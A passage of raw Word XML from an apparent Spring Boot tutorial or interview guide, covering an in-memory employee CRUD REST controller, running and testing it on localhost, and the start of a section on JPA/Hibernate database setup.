    <w:p w14:paraId="523926FC"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return employees.stream().filter(e -&gt; e.getId().equals(id)).findFirst().orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759972F3"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADBD994" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F36BBA2"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 Update employee details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C930E2"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utMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6531D5"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ublic Employee updateEmployee(@PathVariable Long id, @RequestBody Employee employeeDetails) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B35893B"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Employee employee = employees.stream().filter(e -&gt; e.getId().equals(id)).findFirst().orElse(null);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE4F88"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if (employee != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9E0FF7"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employee.setName(employeeDetails.getName());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D73E70"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employee.setDepartment(employeeDetails.getDepartment());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C832201"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC7FF6"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return employee;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43860D75"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BF1C8C" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26B6CE93"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 Delete an employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1F9B38"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DeleteMapping("/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D928791"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ublic String deleteEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69677F71"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employees.removeIf(e -&gt; e.getId().equals(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429113FA"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return "Employee with ID " + id + " deleted.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B8364F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00086266"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB39388" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>5. Create the Application Class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702FB640"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This is the main class to run your Spring Boot application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716FA7AA"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package com.example.restapi;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63800CAE" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42736D04"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import org.springframework.boot.SpringApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612A0B51"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import org.springframework.boot.autoconfigure.SpringBootApplication;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25010C9A" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="344D322F"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SpringBootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AFE6F"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public class RestApiApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4F9522"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ublic static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1904A7"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SpringApplication.run(RestApiApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D46990"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E28C8F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22371C39" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6. Run the Application:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37427B1E"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Once you have created the necessary classes, you can run your Spring Boot application by executing the main class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7A0186"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mvn spring-boot:run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F991A11" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. Testing the API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F89D457"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You can test your RESTful API using tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Postman</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A40977" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2031"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET all employees</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510BD772" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Endpoint: GET http://localhost:8080/api/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E55199D" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2031"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST a new employee</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C476C6" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Endpoint: POST http://localhost:8080/api/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590D627E" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188706F" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4E4B69" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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id": 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AFC300" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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name": "John Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D8B842" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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department": "Engineering"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A218CFA" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642A13DB" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2031"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET a specific employee by ID</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D48ABE0" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Endpoint: GET http://localhost:8080/api/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F678C2" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2031"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT update employee details</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35836FC9" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Endpoint: PUT http://localhost:8080/api/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E644C89" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Body:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D8E76E" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7433419F" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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name": "Jane Doe",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6968B8" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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department": "Marketing"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE353B3" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0EF9C8" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2031"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE an employee</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C913BF6" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2031"/>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Endpoint: DELETE http://localhost:8080/api/employees/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB5F8BA" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>8. Optional Enhancements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213BF6C" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2032"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Database Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Use JPA or Spring Data JPA to persist the data in a database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA399DA" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2032"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Validation</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add @Valid annotations and validation constraints (e.g., @NotNull, @Size) to the model class to validate incoming data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715237B4" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2032"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exception Handling</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Implement global exception handling using @ControllerAdvice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2FE9CD" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2032"/>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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Security</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Add Spring Security to handle authentication and authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B294F97" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF1FE9" w14:textId="77777777" w:rsidR="00A3429F" w:rsidRPr="000108F2" w:rsidRDefault="00A3429F"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By following these steps, you will have a basic RESTful API in Spring Boot with CRUD operations. You can further enhance it by integrating a database, adding validation, and implementing security as per your application's requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C7291" w14:textId="5AEBE8D7"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FC7B15B">
          <v:rect id="_x0000_i2511" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E2D4BF" w14:textId="0918CFB2" w:rsidR="005B44BF" w:rsidRPr="00CE4B95" w:rsidRDefault="005B44BF" w:rsidP="005B44BF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="575" w:name="_Toc196308055"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you connect Spring Boot with a database (JPA/Hibernate)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="575"/>
    </w:p>
    <w:p w14:paraId="10936EF8" w14:textId="4492AB5A" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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To connect </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JPA/Hibernate</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0314E2EF" w14:textId="77777777" w:rsidR="0057499D" w:rsidRPr="000108F2" w:rsidRDefault="0057499D" w:rsidP="000108F2">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Add Dependencies in pom.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53529F33"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First, add the necessary dependencies to your pom.xml file. These include </w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Data JPA</w:t>
      </w:r>
      <w:r w:rsidRPr="000108F2">
